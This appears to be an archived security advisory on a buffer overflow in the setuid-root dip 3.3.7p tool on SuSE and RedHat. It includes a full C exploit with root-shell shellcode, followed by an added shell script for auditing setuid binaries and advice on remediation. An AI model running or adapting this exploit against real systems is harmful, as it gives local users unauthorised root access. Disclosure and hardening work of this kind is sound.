COMMAND

    dip

SYSTEMS AFFECTED

    dip 3.3.7p

PROBLEM

    'sebi hegi' found the following.  After checking his SuSE Linux 7.0
    x86 system he noticed something interesting:

        hegi@faust:~ > ls -la /usr/sbin/dip
        -rwsr-xr--   1 root     dialout     62056 Jul 29  2000 /usr/sbin/dip

        DIP: Dialup IP Protocol Driver version 3.3.7p-uri (25 Dec 96)
        Written by Fred N. van Kempen, MicroWalt Corporation.

    It looks like this version is still vulnerable, although the  issue
    went public in 1998.  The binary is not world executable (only root
    and members of the dialout group can run it), but it is  still a
    security risk on SuSE 7.0, and we are wondering why SuSE, at least,
    still ships a package with a known vulnerability.

    /* Linux x86 dip 3.3.7p exploit by pr10n */

    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <unistd.h>

    #define NOP     0x90
    #define BUFSIZE 136     /* length of the argument handed to dip -l */

    /* thanks to hack.co.za: setreuid(0,0); execve("/bin/sh"); exit() */
    char shellcode[] =
              "\x31\xc0\x31\xdb\x31\xc9\xb0\x46\xcd\x80\xeb\x1d"
              "\x5e\x88\x46\x07\x89\x46\x0c\x89\x76\x08\x89\xf3"
              "\x8d\x4e\x08\x8d\x56\x0c\xb0\x0b\xcd\x80\x31\xc0"
              "\x31\xdb\x40\xcd\x80\xe8\xde\xff\xff\xff/bin/sh";

    /* current stack pointer; only meaningful on 32-bit x86 */
    unsigned long get_sp(void)
    {
        unsigned long sp;
        __asm__ __volatile__("movl %%esp, %0" : "=r"(sp));
        return sp;
    }

    int main(int argc, char *argv[])
    {
        char buf[BUFSIZE + 1];      /* one extra byte for the terminating NUL */
        int i;
        int offset = 0;
        unsigned long ret;

        if (argc != 2) {
            printf("usage: %s offset\n", argv[0]);
            exit(0);
        }

        offset = atoi(argv[1]);

        /* guessed return address: our own stack pointer minus the offset */
        ret = get_sp() - offset;

        /* fill the buffer with copies of the return address, one byte off
           alignment so that one copy lands on dip's saved EIP; the last
           store spills into buf[BUFSIZE], which the NUL below overwrites */
        for (i = 1; i < BUFSIZE; i += 4)
            *(unsigned long *)&buf[i] = ret;

        printf("\nusing: 0x%lx\n\n", ret);

        /* NOP sled first, then the shellcode, the return addresses remain
           in the tail of the buffer */
        for (i = 0; i < (int)(BUFSIZE - strlen(shellcode) - 40); i++)
            buf[i] = NOP;

        memcpy(buf + i, shellcode, strlen(shellcode));
        buf[BUFSIZE] = '\0';

        execl("/usr/sbin/dip", "dip", "-k", "-l", buf, (char *)0);
        perror("execl");            /* only reached if dip could not be run */
        return 1;
    }

    The same package, with the same  problem, ships on SuSE 7.1 and RedHat
    6.2.  SuSE 6.2 and 6.3 are also vulnerable and setuid root, but there,
    just as on SuSE 7.0, normal users don't have execute permission on the
    binary.
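    The distinction the advisory keeps drawing, setuid root versus who is
    actually allowed to execute the binary, is easy to check by hand but
    worth scripting across a fleet.  The following POSIX shell check is an
    added example, not part of the original report or of the dip package:
    it classifies a file from its ls mode string, owner and group the same
    way the ls line above was read.  The function names classify_setuid
    and check_path are my own, check_path assumes the usual "ls -l" field
    order (mode, links, owner, group), and the sample inputs are
    constructed from the permission strings discussed on this page.

```shell
#!/bin/sh
# Added example (not from the advisory): who can reach a setuid-root binary?
# Function names and sample inputs are my own.

# classify_setuid MODE OWNER GROUP
#   MODE is the 10-character mode field from "ls -l", e.g. -rwsr-xr--
#   Prints one of:
#     not-setuid              setuid bit clear
#     setuid-nonroot:OWNER    setuid, but not to root
#     setuid-root:world       anyone on the box can run it
#     setuid-root:group:G     only root and members of group G can run it
#     setuid-root:owner-only  nobody but root can run it
classify_setuid() {
    mode=$1
    owner=$2
    group=$3
    case "$mode" in
        ???[sS]*) ;;                       # 4th char: owner x slot carries setuid
        *) echo "not-setuid"; return 0 ;;
    esac
    if [ "$owner" != root ]; then
        echo "setuid-nonroot:$owner"
        return 0
    fi
    case "$mode" in
        ?????????[xt]*) echo "setuid-root:world" ;;         # others have x
        ??????[xs]*)    echo "setuid-root:group:$group" ;;  # only group has x
        *)              echo "setuid-root:owner-only" ;;
    esac
}

# check_path PATH
#   Classify a real file, following symlinks, using the mode/owner/group
#   fields of "ls -ldL" (assumed field order: mode links owner group).
check_path() {
    if [ ! -e "$1" ]; then
        echo "absent"
        return 0
    fi
    set -- $(ls -ldL "$1")
    classify_setuid "$1" "$3" "$4"
}

# Report on the binary from the advisory plus one well-known setuid tool.
for p in /usr/sbin/dip /usr/bin/passwd; do
    printf '%s: %s\n' "$p" "$(check_path "$p")"
done
```

    On the SuSE 7.0 line quoted above this yields setuid-root:group:dialout,
    i.e. every account in the dialout group is one stack overflow away from
    root, while world-executable copies (setuid-root:world) expose every
    local user.  Until a fixed package exists, the usual interim measures
    are to remove the setuid bit with chmod u-s or to keep the dialout group
    down to the accounts that genuinely need it.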

SOLUTION

    Nothing yet.